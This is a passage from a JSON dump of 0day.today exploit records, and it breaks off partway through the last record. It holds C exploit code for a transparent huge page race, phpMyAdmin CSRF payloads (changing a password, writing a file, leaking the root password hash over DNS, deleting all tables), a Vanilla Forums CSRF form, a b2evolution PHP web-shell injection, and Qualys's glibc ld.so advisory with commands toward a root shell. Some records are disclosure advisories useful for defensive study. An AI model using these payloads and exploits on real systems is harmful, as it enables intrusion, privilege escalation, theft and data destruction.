merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n \r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n \r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n \r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n \r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29087"}, {"lastseen": "2018-08-29T14:35:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-08-29T00:00:00", "published": "2018-08-29T00:00:00", "id": "1337DAY-ID-30984", "href": "https://0day.today/exploit/description/30984", "title": "phpMyAdmin 4.7.x - Cross-Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery\r\n# Exploit Author: VulnSpy\r\n# Vendor Homepage: https://www.phpmyadmin.net/\r\n# Software Link: https://www.phpmyadmin.net/downloads/\r\n# Version: Versions 4.7.x (prior to 4.7.7)\r\n# Tested on: php7 mysql5\r\n# CVE: CVE-2017-1000499\r\n \r\n# Exploit CSRF - Modifying the password of current user\r\n \r\n<p>Hello World</p>\r\n<img src=\"\r\nhttp://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password\r\n%20=%20PASSWORD(%27www.vulnspy.com%27)\" style=\"display:none;\" />\r\n \r\n# Exploit CSRF - Arbitrary File Write\r\n \r\n<p>Hello World</p>\r\n<img src=\"\r\nhttp://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select\r\n'<?php phpinfo();?>' into outfile '/var/www/html/test.php';\"\r\nstyle=\"display:none;\" />\r\n \r\n# Exploit CSRF - Data Retrieval over DNS\r\n \r\nSELECT LOAD_FILE(CONCAT('\\\\\\\\',(SELECT password FROM mysql.user WHERE\r\nuser='root' LIMIT 1),'.vulnspy.com\\\\test'));\r\n \r\n# Exploit CSRF - Empty All Rows From All Tables\r\n \r\n<p>Hello World</p>\r\n<img src=\"\r\nhttp://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A\"\r\nstyle=\"display:none;\" />\n\n# 0day.today [2018-08-29] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30984"}, {"lastseen": "2018-04-09T13:42:41", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-01-08T00:00:00", "published": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29403", "id": "1337DAY-ID-29403", "title": "Vanilla < 2.1.5 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432\r\n# Google Dork: NA\r\n# Date: 7/1/2018\r\n# Contact: https://twitter.com/anandm47\r\n# website: https://anandtechzone.blogspot.in <https://t.co/MJ8SoRaIMn>\r\n# Exploit Author: Anand Meyyappan\r\n# Vendor Homepage: https://open.vanillaforums.com <https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14>\r\n# Software Link: https://open.vanillaforums.com/addon/vanilla-core-2.1\r\n# Tested on: Windows, Linux\r\n# CVE : CVE-2017-1000432\r\n \r\nDescription\r\n \r\n \r\nAny registered user can delete topics and comments in forum without having admin access.\r\n \r\n \r\n \r\n2.Proof Of Concept\r\n \r\n \r\n \r\nSave the below code in html format, Once victim is logged into account. Use the below code.\r\n \r\n<form method=\"post\" action=\"https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709\"> \r\n<input name=\" DeliveryType\" value=\"VIEW\" class=\"input\" type=\"hidden\"> \r\n<input name=\" DeliveryMethod\" value=\"JSON\" class=\"input\" type=\"hidden\"> <li>\r\n<label><br></label><input value=\"Send\" class=\"submit\" type=\"submit\"></li> </ul> \r\n</form>\r\n \r\n3. Solution:\r\n \r\n \r\nUpdate to version 2.5\r\n \r\nhttps://open.vanillaforums.com/get/vanilla-core-2.5\r\n \r\n \r\n \r\n#Reference\r\n \r\nhttps://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14\r\nhttps://www.cvedetails.com/cve/CVE-2017-1000432/\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000432\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29403", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-18T21:29:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-01-03T00:00:00", "published": "2018-01-03T00:00:00", "href": "https://0day.today/exploit/description/29361", "id": "1337DAY-ID-29361", "type": "zdt", "title": "b2evolution CMS 6.8.10 PHP Code Execution Vulnerability", "sourceData": "b2evolution CMS 6.6.0 - 6.8.10 PHP code execution\r\n#################################################\r\n\r\nInformation\r\n===========\r\n\r\nName: b2evolution CMS 6.8.10\r\nSoftware: b2evolution CMS\r\nHomepage: http://b2evolution.net/\r\nVulnerability: PHP code execution\r\nPrerequisites: publicly accessible /install functionality\r\nCVE: CVE-2017-1000423\r\nCredit: Anti RA$?is\r\nHTML version: https://bitflipper.eu\r\n\r\nDescription\r\n===========\r\n\r\nUnauthenticated user with access to `/install` functionality can\r\nconfigure the\r\napplication installation parameters and complete the installation. This\r\nfunctionality can be used to execute PHP code on the server.\r\n\r\nProof of Concept\r\n================\r\n\r\nApplication needs to be installed and configured after coping the source\r\ncode\r\nto the server. After installation and configuration (`/install`) is\r\ncomplete,\r\nthe application will create a `/conf/_basic_config.php` file. It contains\r\ndatabase connection credentials and other settings. Unauthenticated attacker\r\nwith access to `/intall` functionality can use it to execute PHP code by\r\ninjecting it into different values.\r\n\r\nFollowing scenario demonstrates the issue on Apache web-server.\r\n\r\nFollowing request is made after base configuration is completed:\r\n================[ src start ]================\r\nPOST /install/index.php HTTP/1.1\r\nHost: victim.site\r\nContent-Length: 214\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n\r\nconf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&\r\nconf_db_password=root&conf_baseurl=http%3A%2F%2Fvictim.site%2F&\r\nconf_admin_email=admin%40localhost&submit=Update+config+file&\r\naction=conf&locale=en-US\r\n================[ src end ]==================\r\n\r\nApplication creates the `/conf/_basic_config.php` using user supplied\r\nvalues:\r\n\r\n================[ src start ]================\r\n...\r\n/**\r\n * MySQL DB settings.\r\n * Fill in your database details (check carefully or nothing will work!)\r\n */\r\n$db_config = array(\r\n 'user' => 'root', // your MySQL username\r\n 'password' => 'root', // ...and password\r\n 'name' => 'b2evolution', // the name of the database\r\n 'host' => 'localhost', // MySQL Server (typically 'localhost')\r\n);\r\n...\r\n$baseurl = 'http://victim.site/';\r\n...\r\n$admin_email = '[email\u00a0protected]';\r\n...\r\n================[ src end ]==================\r\n\r\nIn case the application is installed on public server, the installation\r\nfunctionality is publicly accessible to everyone accessing the vulnerable\r\nsite. Assuming that the attacker manages to find a application in this\r\nstate,\r\nbefore the initial installation in completed, they can use previously\r\ndescribed\r\nrequest to execute PHP code on the victim's server.\r\n\r\nFollowing parameters are vulnerable and can be used for this attack:\r\n * conf_db_tableprefix\r\n * conf_admin_email\r\n * conf_baseurl\r\n\r\nLet's use `conf_baseurl` for example. Attacker specifies the following\r\nvalue as\r\nbase URL:\r\n\r\n================[ src start ]================\r\nhttp://victim.site/\\\\';$r=$_REQUEST;if(isset($r[0])){$r[0]($r[1]);}/*\r\n================[ src end ]==================\r\n\r\nAfter finishing the basic setup, following request is made.\r\n\r\n================[ src start ]================\r\nPOST /install/index.php HTTP/1.1\r\nHost: victim.site\r\nContent-Length: 319\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n\r\nconf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&\r\nconf_db_password=root&\r\nconf_baseurl=http%3A%2F%2Fvictim.site%2F%5C%5C%27%3B%24r%3D%24_REQUEST%3Bif\r\n%28isset%28%24r%5B0%5D%29%29%7B%24r%5B0%5D%28%24r%5B1%5D%29%3B%7D%2F*&\r\nconf_admin_email=admin%40localhost&submit=Update+config+file&action=conf&\r\nlocale=en-US\r\n================[ src end ]==================\r\n\r\nApplication creates the `/conf/_basic_config.php` using attacker given\r\nvalues:\r\n\r\n================[ src start ]================\r\n...\r\n/**\r\n * MySQL DB settings.\r\n * Fill in your database details (check carefully or nothing will work!)\r\n */\r\n$db_config = array(\r\n 'user' => 'root', // your MySQL username\r\n 'password' => 'root', // ...and password\r\n 'name' => 'b2evolution', // the name of the database\r\n 'host' => 'localhost', // MySQL Server (typically 'localhost')\r\n);\r\n...\r\n$baseurl = 'http://victim.site/\\\\';$r=$_REQUEST;\r\n if(isset($r[0])){$r[0]($r[1]);}/*/';\r\n...\r\n$admin_email = '[email\u00a0protected]';\r\n...\r\n================[ src end ]==================\r\n\r\nAttacker can use the PHP shell to execute code and take control of the site:\r\nview-source:http://victim.site/install/index.php?0=system&1=ls%20-lah;pwd\r\n\r\n================[ src start ]================\r\n\r\ntotal 676K\r\ndrwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 .\r\ndrwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:36 ..\r\n-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_create.php\r\n-rw-rw-rw- 1 vagrant vagrant 2.2K Jul 23 00:26 _functions_delete.php\r\n-rw-rw-rw- 1 vagrant vagrant 349K Jul 23 00:26 _functions_evoupgrade.php\r\n-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_install.php\r\n-rw-rw-rw- 1 vagrant vagrant 14K Jul 23 00:26 automated-install.html\r\n-rw-rw-rw- 1 vagrant vagrant 13K Jul 23 00:26 debug.php\r\n-rw-rw-rw- 1 vagrant vagrant 831 Jul 23 00:26 index.html\r\n-rw-rw-rw- 1 vagrant vagrant 52K Jul 23 00:26 index.php\r\n-rw-rw-rw- 1 vagrant vagrant 16K Jul 23 00:26 license.txt\r\n-rw-rw-rw- 1 vagrant vagrant 523 Jul 23 00:26 phpinfo.php\r\ndrwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 test\r\n/var/www/b2evolution/install\r\n...\r\n================[ src end ]==================\r\n\r\nImpact\r\n======\r\n\r\nUnauthenticated attacker can execute PHP code on the server. This can be\r\nused\r\nto further compromise the site and hide the initial shell on the server.\r\n\r\nConclusion\r\n==========\r\n\r\nUnrestricted access to basic install functionality allows unauthenticated\r\nattacker to execute PHP code on the server and compromise the site.\r\n\r\nNew release has been made available to mitigate this issue:\r\n\r\n* http://b2evolution.net/downloads/6-9-3\r\n\r\nTimeline\r\n========\r\n\r\n* 08.08.2017 | me | vulnerability discovered\r\n* 08.08.2017 | me > developer | contacted the developer\r\n* 09.08.2017 | developer | vulnerability patched\r\n* 12.08.2017 | me > DWF | CVE requested\r\n* 12.08.2017 | me > developer | asked about patch release estimate\r\n* 25.08.2017 | developer > public | new release with patch made available\r\n* 31.08.2017 | me > public | full disclosure\r\n* 29.12.2017 | DWF > me | CVE assigned\r\n\r\n---\r\nAnti RA$?is\r\nBlog: https://bitflipper.eu\r\nPentester at http://www.clarifiedsecurity.com\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/29361", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-02T09:35:47", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2017-12-14T00:00:00", "published": "2017-12-14T00:00:00", "href": "https://0day.today/exploit/description/29207", "id": "1337DAY-ID-29207", "title": "glibc ld.so - Memory Leak / Buffer Overflow Vulnerability", "type": "zdt", "sourceData": "Qualys Security Advisory\r\n \r\nBuffer overflow in glibc's ld.so\r\n \r\n \r\n========================================================================\r\nContents\r\n========================================================================\r\n \r\nSummary\r\nMemory Leak\r\nBuffer Overflow\r\nExploitation\r\nAcknowledgments\r\n \r\n \r\n========================================================================\r\nSummary\r\n========================================================================\r\n \r\nWe have discovered a memory leak and a buffer overflow in the dynamic\r\nloader (ld.so) of the GNU C Library (glibc):\r\n \r\n- the memory leak (CVE-2017-1000408) first appeared in glibc 2.1.1\r\n (released on May 24, 1999) and can be reached and amplified through\r\n the LD_HWCAP_MASK environment variable;\r\n \r\n- the buffer overflow (CVE-2017-1000409) first appeared in glibc 2.5\r\n (released on September 29, 2006) and can be triggered through the\r\n LD_LIBRARY_PATH environment variable.\r\n \r\nFurther investigation showed that:\r\n \r\n- the buffer overflow is not exploitable if\r\n /proc/sys/fs/protected_hardlinks is enabled (it is not enabled by\r\n default on vanilla Linux kernels, but most Linux distributions turn it\r\n on by default);\r\n \r\n- the memory leak and the buffer overflow are not exploitable if the\r\n glibc is patched against CVE-2017-1000366, because this patch ignores\r\n the LD_HWCAP_MASK and LD_LIBRARY_PATH environment variables when SUID\r\n binaries are executed (CVE-2017-1000366 was first patched in glibc\r\n 2.26, released on August 2, 2017, but most Linux distributions had\r\n already backported this patch on June 19, 2017).\r\n \r\nWe have therefore rated the impact of these vulnerabilities as Low.\r\nNevertheless, we give a brief analysis of the vulnerable function, and\r\npresent a simple method for exploiting a SUID binary on the command line\r\nand obtaining full root privileges (if /proc/sys/fs/protected_hardlinks\r\nis not enabled, and CVE-2017-1000366 is not patched).\r\n \r\n \r\n========================================================================\r\nMemory Leak (CVE-2017-1000408)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so malloc()ates \"rtld_search_dirs.dirs[0]\", a\r\ncache of information about the system's trusted directories (typically\r\n\"/lib\" and \"/usr/lib\" on 32-bit or \"/lib64\" and \"/usr/lib64\" on 64-bit).\r\nTo compute the number of system directories, ld.so uses the classic C\r\nidiom \"sizeof (system_dirs) / sizeof (system_dirs[0])\":\r\n \r\n 691 rtld_search_dirs.dirs[0] = (struct r_search_path_elem *)\r\n 692 malloc ((sizeof (system_dirs) / sizeof (system_dirs[0]))\r\n 693 * round_size * sizeof (struct r_search_path_elem));\r\n \r\nUnfortunately, \"system_dirs\" is not a classic array: it is not an array\r\nof strings (pointers to characters), but rather an array of characters,\r\nthe concatenation of all system directories, separated by null bytes:\r\n \r\n 109 static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\nwhere \"SYSTEM_DIRS\" is generated by \"gen-trusted-dirs.awk\" (typically\r\n\"/lib/\\0/usr/lib/\" on 32-bit or \"/lib64/\\0/usr/lib64/\" on 64-bit). As a\r\nresult, the number of system directories is overestimated, and too much\r\nmemory is allocated for \"rtld_search_dirs.dirs[0]\": if \"system_dirs\" is\r\n\"/lib/\\0/usr/lib/\" for example, the number of system directories is 2,\r\nbut 16 is used instead (the number of characters in \"system_dirs\") to\r\ncompute the size of \"rtld_search_dirs.dirs[0]\".\r\n \r\nThis extra memory is never accessed, never freed, and mostly filled with\r\nnull bytes, because only the information about \"nsystem_dirs_len\" system\r\ndirectories (the correct number of system directories) is written to\r\n\"rtld_search_dirs.dirs[0]\", and because the minimal malloc()\r\nimplementation in ld.so calls mmap(), but never munmap().\r\n \r\nMoreover, this memory leak can be amplified through the LD_HWCAP_MASK\r\nenvironment variable, because ld.so uses \"ncapstr\" (the total number of\r\nhardware-capability combinations) to compute the size of\r\n\"rtld_search_dirs.dirs[0]\":\r\n \r\n 687 round_size = ((2 * sizeof (struct r_search_path_elem) - 1\r\n 688 + ncapstr * sizeof (enum r_dir_status))\r\n 689 / sizeof (struct r_search_path_elem));\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit ab7eb292307152e706948a7b19164ff5e6d593d4\r\nDate: Mon May 3 21:59:35 1999 +0000\r\n \r\n Update.\r\n \r\n * elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk.\r\n * elf/gen-trusted-dirs.awk: New file.\r\n * elf/dl-load.c (systems_dirs): Moved into file scope. Initialize\r\n from SYSTEM_DIRS macro.\r\n (system_dirs_len): New variable. Contains lengths of system_dirs\r\n strings.\r\n (fillin_rpath): Rewrite for systems_dirs being a simple string.\r\n Improve string comparisons. Change parameter trusted to be a flag.\r\n Change all callers.\r\n (_dt_init_paths): Improve using new format for system_dirs.\r\n \r\nwhich transformed \"system_dirs\" from an array of strings (pointers to\r\ncharacters) into an array of characters:\r\n \r\n- static const char *system_dirs[] =\r\n- {\r\n-#include \"trusted-dirs.h\"\r\n- NULL\r\n- };\r\n...\r\n+static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\n \r\n========================================================================\r\nBuffer Overflow (CVE-2017-1000409)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so computes \"nllp\", the number of\r\ncolon-separated directories in \"llp\" (the LD_LIBRARY_PATH environment\r\nvariable), malloc()ates \"env_path_list.dirs\", an array of \"nllp + 1\"\r\npointers to \"r_search_path_elem\" structures (one for each directory in\r\n\"llp\", plus a terminating NULL pointer), and calls fillin_rpath() to\r\nfill in \"env_path_list.dirs\":\r\n \r\n 777 if (llp != NULL && *llp != '\\0')\r\n 778 {\r\n 779 size_t nllp;\r\n 780 const char *cp = llp;\r\n 781 char *llp_tmp;\r\n ...\r\n 803 nllp = 1;\r\n 804 while (*cp)\r\n 805 {\r\n 806 if (*cp == ':' || *cp == ';')\r\n 807 ++nllp;\r\n 808 ++cp;\r\n 809 }\r\n 810 \r\n 811 env_path_list.dirs = (struct r_search_path_elem **)\r\n 812 malloc ((nllp + 1) * sizeof (struct r_search_path_elem *));\r\n ...\r\n 819 (void) fillin_rpath (llp_tmp, env_path_list.dirs, \":;\",\r\n 820 __libc_enable_secure, \"LD_LIBRARY_PATH\",\r\n 821 NULL, l);\r\n \r\nUnfortunately, ld.so parses the \"llp\" string to compute \"nllp\" but\r\nparses the \"llp_tmp\" string (an expanded copy of \"llp\") to fill in\r\n\"env_path_list.dirs\". As a result, the number of pointers written to\r\n\"env_path_list.dirs\" can be greater than \"nllp + 1\" (an mmap()-based\r\nbuffer overflow) if the contents of \"llp_tmp\" differ from the contents\r\nof \"llp\" (if \"llp_tmp\" contains more colons than \"llp\"):\r\n \r\n 784 /* Expand DSTs. */\r\n 785 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 786 if (__glibc_likely (cnt == 0))\r\n 787 llp_tmp = strdupa (llp);\r\n 788 else\r\n 789 {\r\n 790 /* Determine the length of the substituted string. */\r\n 791 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 792 \r\n 793 /* Allocate the necessary memory. */\r\n 794 llp_tmp = (char *) alloca (total + 1);\r\n 795 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 796 }\r\n \r\nThe Dynamic String Tokens (DSTs) $LIB and $PLATFORM are expanded to\r\nfixed strings that do not contain colons (typically \"lib\" and \"i686\" on\r\n32-bit or \"lib64\" and \"x86_64\" on 64-bit), but the expansion of $ORIGIN\r\n(the directory of the binary being executed) can inject extra colons\r\ninto \"llp_tmp\" and hence extra pointers into \"env_path_list.dirs\".\r\n \r\nTo exploit this buffer overflow, a local attacker must therefore be able\r\nto:\r\n \r\n- hard-link a SUID binary into a directory whose pathname contains\r\n colons (i.e., /proc/sys/fs/protected_hardlinks must not be enabled);\r\n \r\n- pass the LD_LIBRARY_PATH environment variable to _dl_init_paths()\r\n (i.e., CVE-2017-1000366 must not be patched).\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit 950398e1320255572f4228db94344dcd5f613455\r\nDate: Tue Aug 29 01:44:27 2006 +0000\r\n \r\n * elf/dl-load.c (_dl_init_paths): Expand DSTs.\r\n \r\nwhich added the expansion of llp's Dynamic String Tokens (DSTs) to\r\n_dl_init_paths():\r\n \r\n- char *llp_tmp = strdupa (llp);\r\n+ char *llp_tmp;\r\n...\r\n+ /* Expand DSTs. */\r\n+ size_t cnt = DL_DST_COUNT (llp, 1);\r\n+ if (__builtin_expect (cnt == 0, 1))\r\n+ llp_tmp = strdupa (llp);\r\n+ else\r\n+ {\r\n+ /* Determine the length of the substituted string. */\r\n+ size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n+\r\n+ /* Allocate the necessary memory. */\r\n+ llp_tmp = (char *) alloca (total + 1);\r\n+ llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n+ }\r\n \r\n \r\n========================================================================\r\nExploitation\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nDebian 9 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit the SUID-root binary \"su\" on a 32-bit Debian\r\n9.0: we installed \"debian-9.0.0-i386-xfce-CD-1.iso\" (the last release\r\nbefore glibc's CVE-2017-1000366 was patched), and manually disabled\r\nprotected_hardlinks (\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n1/ First, we identify the system's trusted directories (the only\r\ndirectories accepted by fillin_rpath() when executing a SUID binary):\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 1607: find library=nonexistent [0]; searching\r\n 1607: search cache=/etc/ld.so.cache\r\n 1607: search path=/lib/i386-linux-gnu/tls/i686:/lib/i386-linux-gnu/tls:/lib/i386-linux-gnu/i686:/lib/i386-linux-gnu:/usr/lib/i386-linux-gnu/tls/i686:/usr/lib/i386-linux-gnu/tls:/usr/lib/i386-linux-gnu/i686:/usr/lib/i386-linux-gnu:/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 1607: trying file=/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/i686/nonexistent\r\n \r\nThe \"system search path\" line shows four system directories:\r\n\"/lib/i386-linux-gnu\", \"/usr/lib/i386-linux-gnu\", \"/lib\", and \"/usr/lib\"\r\n(\"tls\" and \"i686\" are default hardware capabilities that are enabled\r\neven if LD_HWCAP_MASK is 0).\r\n \r\n2/ Second, we create our $ORIGIN directory and hard-link the SUID-root\r\nbinary \"su\" into it:\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\nThe pathname of our $ORIGIN directory contains two system directories:\r\nwe will write 12 bytes (3 pointers: one for each system directory, plus\r\na terminating NULL pointer) to an 8-byte \"env_path_list.dirs\" (\"nllp\" is\r\nonly 1, because our unexpanded LD_LIBRARY_PATH does not contain colons).\r\nIn other words, we will overflow \"env_path_list.dirs\" and write 4 bytes\r\n(the terminating NULL pointer) out of bounds.\r\n \r\n3/ Third, we overwrite this out-of-bounds NULL pointer with the first\r\nbytes of an error message (\"cannot open shared object file\") that is\r\nmalloc()ated after \"env_path_list.dirs\" because of our \"nonexistent\"\r\npreload library. Consequently, ld.so crashes when open_path() tries to\r\nopen our second preload library \"rootshell.so\" in a directory described\r\nby an \"r_search_path_elem\" structure located at the unmapped address\r\n0x6e6e6163 (the overwritten NULL pointer):\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[70632.888695] su[2293]: segfault at 6e6e6173 ip b77e1c43 sp bfc946dc error 4 in ld-2.24.so[b77db000+22000]\r\n \r\nThe \"/../../../../../../../../$LIB\" suffix is required, to pass the\r\n\"check_for_trusted\" test in _dl_dst_substitute() (our expanded\r\nLD_LIBRARY_PATH must be rooted in one of the system's trusted\r\ndirectories).\r\n \r\n4/ Next, we copy the library dependencies of \"su\" to our current working\r\ndirectory, and compile our preload library \"rootshell.so\" (\"la.c\" can be\r\nfound at the beginning of our stack-clash exploit \"Linux_ldso_hwcap.c\"):\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\nThis \"chmod\" is required, to pass the SUID-bit test in open_path().\r\n \r\n5/ Last, we run \"su\" with an increasing number of hardware capabilities\r\n(i.e., with an increasingly large \"rtld_search_dirs.dirs[0]\"), until the\r\n\"rtld_search_dirs.dirs[0]\" occupies the address 0x6e6e6163. Because this\r\n\"rtld_search_dirs.dirs[0]\" is mostly filled with null bytes, and because\r\nan \"r_search_path_elem\" structure filled with null bytes is equivalent\r\nto the current working directory in open_path(), ld.so will eventually\r\nload and execute our \"rootshell.so\" from the current working directory:\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.715s\r\nuser 0m0.120s\r\nsys 0m0.588s\r\n \r\n$ time env -i 